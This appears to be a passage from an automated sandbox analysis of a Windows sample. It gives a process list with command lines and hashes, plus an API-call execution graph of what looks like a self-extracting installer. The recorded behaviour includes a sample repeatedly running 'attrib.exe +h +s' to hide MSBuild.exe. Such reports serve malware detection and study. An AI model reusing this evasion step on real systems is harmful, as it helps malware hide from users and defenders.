                                                                                                                    Imagebase:0x2d0000
                                                                                                                    File size:187'904 bytes
                                                                                                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:15
                                                                                                                    Start time:17:20:56
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                    File size:862'208 bytes
                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:16
                                                                                                                    Start time:17:20:57
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
                                                                                                                    Imagebase:0x940000
                                                                                                                    File size:262'432 bytes
                                                                                                                    MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:17
                                                                                                                    Start time:17:20:57
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                    File size:862'208 bytes
                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:18
                                                                                                                    Start time:17:21:06
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                    Imagebase:0x50000
                                                                                                                    File size:262'432 bytes
                                                                                                                    MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:19
                                                                                                                    Start time:17:21:06
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                    File size:862'208 bytes
                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:20
                                                                                                                    Start time:17:21:10
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\SysWOW64\attrib.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                                                                                                                    Imagebase:0xe50000
                                                                                                                    File size:19'456 bytes
                                                                                                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:21
                                                                                                                    Start time:17:21:10
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                    File size:862'208 bytes
                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:22
                                                                                                                    Start time:17:21:16
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\SysWOW64\attrib.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                                                                                                                    Imagebase:0xe50000
                                                                                                                    File size:19'456 bytes
                                                                                                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:23
                                                                                                                    Start time:17:21:16
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                    File size:862'208 bytes
                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:25
                                                                                                                    Start time:17:21:29
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\SysWOW64\attrib.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                                                                                                                    Imagebase:0xe50000
                                                                                                                    File size:19'456 bytes
                                                                                                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:26
                                                                                                                    Start time:17:21:29
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                    File size:862'208 bytes
                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:27
                                                                                                                    Start time:17:21:48
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\SysWOW64\attrib.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                                                                                                                    Imagebase:0xe50000
                                                                                                                    File size:19'456 bytes
                                                                                                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:28
                                                                                                                    Start time:17:21:48
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                    File size:862'208 bytes
                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:29
                                                                                                                    Start time:17:22:01
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\SysWOW64\attrib.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                                                                                                                    Imagebase:0xe50000
                                                                                                                    File size:19'456 bytes
                                                                                                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:30
                                                                                                                    Start time:17:22:01
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                    File size:862'208 bytes
                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:31
                                                                                                                    Start time:17:22:19
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\SysWOW64\attrib.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                                                                                                                    Imagebase:0xe50000
                                                                                                                    File size:19'456 bytes
                                                                                                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:32
                                                                                                                    Start time:17:22:19
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                    File size:862'208 bytes
                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:33
                                                                                                                    Start time:17:22:35
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\SysWOW64\attrib.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                                                                                                                    Imagebase:0xe50000
                                                                                                                    File size:19'456 bytes
                                                                                                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:34
                                                                                                                    Start time:17:22:35
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                    File size:862'208 bytes
                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:35
                                                                                                                    Start time:17:22:48
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\SysWOW64\attrib.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                                                                                                                    Imagebase:0xe50000
                                                                                                                    File size:19'456 bytes
                                                                                                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:36
                                                                                                                    Start time:17:22:48
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                    File size:862'208 bytes
                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:37
                                                                                                                    Start time:17:23:01
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\SysWOW64\attrib.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                                                                                                                    Imagebase:0xe50000
                                                                                                                    File size:19'456 bytes
                                                                                                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:38
                                                                                                                    Start time:17:23:01
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                    File size:862'208 bytes
                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:39
                                                                                                                    Start time:17:23:11
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\SysWOW64\attrib.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                                                                                                                    Imagebase:0xe50000
                                                                                                                    File size:19'456 bytes
                                                                                                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:40
                                                                                                                    Start time:17:23:11
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                    File size:862'208 bytes
                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:41
                                                                                                                    Start time:17:23:28
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\SysWOW64\attrib.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                                                                                                                    Imagebase:0xe50000
                                                                                                                    File size:19'456 bytes
                                                                                                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:42
                                                                                                                    Start time:17:23:28
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                    File size:862'208 bytes
                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:43
                                                                                                                    Start time:17:23:43
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\SysWOW64\attrib.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                                                                                                                    Imagebase:0xe50000
                                                                                                                    File size:19'456 bytes
                                                                                                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:44
                                                                                                                    Start time:17:23:43
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                    File size:862'208 bytes
                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:45
                                                                                                                    Start time:17:23:50
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\SysWOW64\attrib.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                                                                                                                    Imagebase:0xe50000
                                                                                                                    File size:19'456 bytes
                                                                                                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:46
                                                                                                                    Start time:17:23:50
                                                                                                                    Start date:03/01/2025
                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                    File size:862'208 bytes
                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true


                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:31.4%
                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                      Signature Coverage:42%
                                                                                                                      Total number of Nodes:928
                                                                                                                      Total number of Limit Nodes:44
7ff761f76706 LocalAlloc 2471->2472 2473 7ff761f76756 2472->2473 2474 7ff761f76726 2472->2474 2475 7ff761f75050 7 API calls 2473->2475 2476 7ff761f74dcc 24 API calls 2474->2476 2477 7ff761f76768 2475->2477 2478 7ff761f76744 2476->2478 2479 7ff761f7676c 2477->2479 2480 7ff761f767a5 lstrcmpA LocalFree 2477->2480 2682 7ff761f77700 GetLastError 2478->2682 2482 7ff761f74dcc 24 API calls 2479->2482 2483 7ff761f767ec 2480->2483 2484 7ff761f76837 2480->2484 2488 7ff761f7678a LocalFree 2482->2488 2493 7ff761f764e4 53 API calls 2483->2493 2487 7ff761f76b14 2484->2487 2490 7ff761f7684f GetTempPathA 2484->2490 2485 7ff761f76749 2486 7ff761f7674f 2485->2486 2491 7ff761f78470 7 API calls 2486->2491 2489 7ff761f77ac8 28 API calls 2487->2489 2488->2486 2489->2486 2492 7ff761f76872 2490->2492 2508 7ff761f768a5 2490->2508 2494 7ff761f73153 2491->2494 2658 7ff761f764e4 2492->2658 2496 7ff761f7680c 2493->2496 2494->2167 2494->2173 2496->2486 2498 7ff761f76814 2496->2498 2499 7ff761f74dcc 24 API calls 2498->2499 2499->2485 2500 7ff761f76adb GetWindowsDirectoryA 2505 7ff761f76ca4 38 API calls 2500->2505 2501 7ff761f768f9 GetDriveTypeA 2503 7ff761f76916 GetFileAttributesA 2501->2503 2518 7ff761f76911 2501->2518 2503->2518 2505->2508 2506 7ff761f764e4 53 API calls 2506->2508 2507 7ff761f76ca4 38 API calls 2507->2518 2508->2486 2508->2500 2508->2501 2509 7ff761f76955 GetDiskFreeSpaceA 2511 7ff761f76983 MulDiv 2509->2511 2509->2518 2510 7ff761f72468 25 API calls 2510->2518 2511->2518 2512 7ff761f76a02 GetWindowsDirectoryA 2512->2518 2513 7ff761f77ba8 CharPrevA 2514 7ff761f76a2a GetFileAttributesA 2513->2514 2515 7ff761f76a40 CreateDirectoryA 2514->2515 2514->2518 2515->2518 2516 7ff761f76a6d SetFileAttributesA 2516->2518 2517 7ff761f764e4 53 API calls 2517->2518 2518->2486 2518->2500 2518->2501 2518->2503 2518->2507 2518->2509 2518->2510 2518->2512 2518->2513 2518->2516 2518->2517 2520 7ff761f76d12 2519->2520 2521 7ff761f76d3f GetDiskFreeSpaceA 2519->2521 2524 7ff761f74dcc 24 API calls 
2520->2524 2522 7ff761f76f63 memset 2521->2522 2523 7ff761f76d80 MulDiv 2521->2523 2736 7ff761f77700 GetLastError 2522->2736 2523->2522 2526 7ff761f76dae GetVolumeInformationA 2523->2526 2527 7ff761f76d2f 2524->2527 2530 7ff761f76e45 SetCurrentDirectoryA 2526->2530 2531 7ff761f76de6 memset 2526->2531 2717 7ff761f77700 GetLastError 2527->2717 2529 7ff761f76f7b GetLastError FormatMessageA 2533 7ff761f76fbd 2529->2533 2540 7ff761f76e6c 2530->2540 2718 7ff761f77700 GetLastError 2531->2718 2532 7ff761f76d34 2535 7ff761f76f41 2532->2535 2536 7ff761f74dcc 24 API calls 2533->2536 2539 7ff761f78470 7 API calls 2535->2539 2538 7ff761f76fd8 SetCurrentDirectoryA 2536->2538 2537 7ff761f76dfe GetLastError FormatMessageA 2537->2533 2538->2535 2542 7ff761f7326f 2539->2542 2541 7ff761f76eb4 2540->2541 2544 7ff761f76ed8 2540->2544 2543 7ff761f74dcc 24 API calls 2541->2543 2542->2167 2542->2180 2543->2532 2544->2535 2719 7ff761f724f8 2544->2719 2547 7ff761f75050 7 API calls 2546->2547 2548 7ff761f75dab FindResourceA LoadResource LockResource 2547->2548 2549 7ff761f75dfc 2548->2549 2565 7ff761f75fcf 2548->2565 2550 7ff761f75e08 GetDlgItem ShowWindow GetDlgItem ShowWindow 2549->2550 2551 7ff761f75e56 2549->2551 2550->2551 2737 7ff761f75c60 #20 2551->2737 2554 7ff761f75e69 #20 2555 7ff761f75e5f 2554->2555 2556 7ff761f75ed1 #22 2554->2556 2557 7ff761f74dcc 24 API calls 2555->2557 2558 7ff761f75f55 2556->2558 2559 7ff761f75f15 #23 2556->2559 2560 7ff761f75f53 2557->2560 2561 7ff761f75f75 2558->2561 2562 7ff761f75f61 FreeResource 2558->2562 2559->2555 2559->2558 2560->2558 2563 7ff761f75f9f 2561->2563 2564 7ff761f75f81 2561->2564 2562->2561 2563->2565 2567 7ff761f75fb1 SendMessageA 2563->2567 2566 7ff761f74dcc 24 API calls 2564->2566 2565->2201 2566->2563 2567->2565 2569 7ff761f74118 2568->2569 2586 7ff761f7412f 2568->2586 2570 7ff761f75050 7 API calls 2569->2570 2570->2586 2571 7ff761f74145 memset 2571->2586 2572 7ff761f74254 2573 7ff761f74dcc 24 API calls 2572->2573 2611 7ff761f74273 
2573->2611 2574 7ff761f744ee 2577 7ff761f78470 7 API calls 2574->2577 2576 7ff761f75050 7 API calls 2576->2586 2578 7ff761f744ff 2577->2578 2578->2192 2579 7ff761f745d8 2579->2574 2582 7ff761f745f2 RegOpenKeyExA 2579->2582 2580 7ff761f742f5 CompareStringA 2580->2579 2580->2586 2581 7ff761f744df LocalFree 2581->2574 2582->2574 2587 7ff761f74627 RegQueryValueExA 2582->2587 2583 7ff761f74599 2585 7ff761f74dcc 24 API calls 2583->2585 2588 7ff761f745b8 LocalFree 2585->2588 2586->2571 2586->2572 2586->2574 2586->2576 2586->2579 2586->2580 2586->2581 2586->2583 2592 7ff761f74394 2586->2592 2594 7ff761f744ad LocalFree 2586->2594 2597 7ff761f741fd CompareStringA 2586->2597 2764 7ff761f71684 2586->2764 2803 7ff761f71d28 memset memset RegCreateKeyExA 2586->2803 2830 7ff761f7473c CreateProcessA 2586->2830 2590 7ff761f7471c RegCloseKey 2587->2590 2591 7ff761f7466c memset GetSystemDirectoryA 2587->2591 2588->2574 2590->2574 2595 7ff761f7469d 2591->2595 2596 7ff761f746b3 2591->2596 2600 7ff761f743a5 GetProcAddress 2592->2600 2601 7ff761f74574 2592->2601 2612 7ff761f744d3 FreeLibrary 2592->2612 2613 7ff761f74480 FreeLibrary 2592->2613 2845 7ff761f779f0 2592->2845 2594->2579 2594->2586 2599 7ff761f77ba8 CharPrevA 2595->2599 2598 7ff761f7114c _vsnprintf 2596->2598 2597->2586 2602 7ff761f746dc RegSetValueExA 2598->2602 2599->2596 2600->2592 2603 7ff761f74521 2600->2603 2604 7ff761f74dcc 24 API calls 2601->2604 2602->2590 2607 7ff761f74dcc 24 API calls 2603->2607 2606 7ff761f74597 2604->2606 2608 7ff761f74553 LocalFree 2606->2608 2609 7ff761f74544 FreeLibrary 2607->2609 2855 7ff761f77700 GetLastError 2608->2855 2609->2608 2611->2574 2612->2581 2613->2594 2615 7ff761f75050 7 API calls 2614->2615 2616 7ff761f73f8b LocalAlloc 2615->2616 2617 7ff761f73fdd 2616->2617 2618 7ff761f73fad 2616->2618 2620 7ff761f75050 7 API calls 2617->2620 2619 7ff761f74dcc 24 API calls 2618->2619 2621 7ff761f73fcb 2619->2621 2622 7ff761f73fef 2620->2622 2892 7ff761f77700 GetLastError 2621->2892 2624 
7ff761f73ff3 2622->2624 2625 7ff761f74030 lstrcmpA 2622->2625 2628 7ff761f74dcc 24 API calls 2624->2628 2626 7ff761f7404e 2625->2626 2627 7ff761f74098 LocalFree 2625->2627 2630 7ff761f77ac8 28 API calls 2626->2630 2632 7ff761f73139 2627->2632 2629 7ff761f74011 LocalFree 2628->2629 2629->2632 2631 7ff761f7406e LocalFree 2630->2631 2631->2632 2632->2161 2632->2167 2633->2196 2635 7ff761f7778a 2634->2635 2636 7ff761f7114c _vsnprintf 2635->2636 2642 7ff761f777b8 FreeResource 2635->2642 2643 7ff761f77803 FreeResource 2635->2643 2637 7ff761f777df FindResourceA 2636->2637 2638 7ff761f7775e LoadResource LockResource 2637->2638 2639 7ff761f77801 2637->2639 2638->2635 2638->2639 2640 7ff761f78470 7 API calls 2639->2640 2641 7ff761f7782e 2640->2641 2641->2184 2642->2635 2643->2639 2645 7ff761f75050 7 API calls 2644->2645 2646 7ff761f74967 LocalAlloc 2645->2646 2647 7ff761f749a9 2646->2647 2648 7ff761f74989 2646->2648 2649 7ff761f75050 7 API calls 2647->2649 2650 7ff761f74dcc 24 API calls 2648->2650 2652 7ff761f749bb 2649->2652 2651 7ff761f749a7 2650->2651 2651->2167 2653 7ff761f749d5 lstrcmpA 2652->2653 2654 7ff761f749bf 2652->2654 2653->2654 2655 7ff761f74a0e LocalFree 2653->2655 2656 7ff761f74dcc 24 API calls 2654->2656 2655->2651 2656->2655 2657->2455 2659 7ff761f76516 2658->2659 2662 7ff761f765dd 2658->2662 2689 7ff761f763b8 2659->2689 2661 7ff761f76688 2665 7ff761f78470 7 API calls 2661->2665 2700 7ff761f76b70 2662->2700 2669 7ff761f766a8 2665->2669 2667 7ff761f765cc 2672 7ff761f77ba8 CharPrevA 2667->2672 2668 7ff761f76577 GetSystemInfo 2677 7ff761f76591 2668->2677 2669->2486 2683 7ff761f72468 GetWindowsDirectoryA 2669->2683 2670 7ff761f76649 2670->2661 2675 7ff761f76ca4 38 API calls 2670->2675 2671 7ff761f7662a CreateDirectoryA 2673 7ff761f7667d 2671->2673 2674 7ff761f7663f 2671->2674 2672->2662 2712 7ff761f77700 GetLastError 2673->2712 2674->2670 2679 7ff761f7665a 2675->2679 2677->2667 2678 7ff761f77ba8 CharPrevA 2677->2678 2678->2667 2679->2661 2681 7ff761f76666 
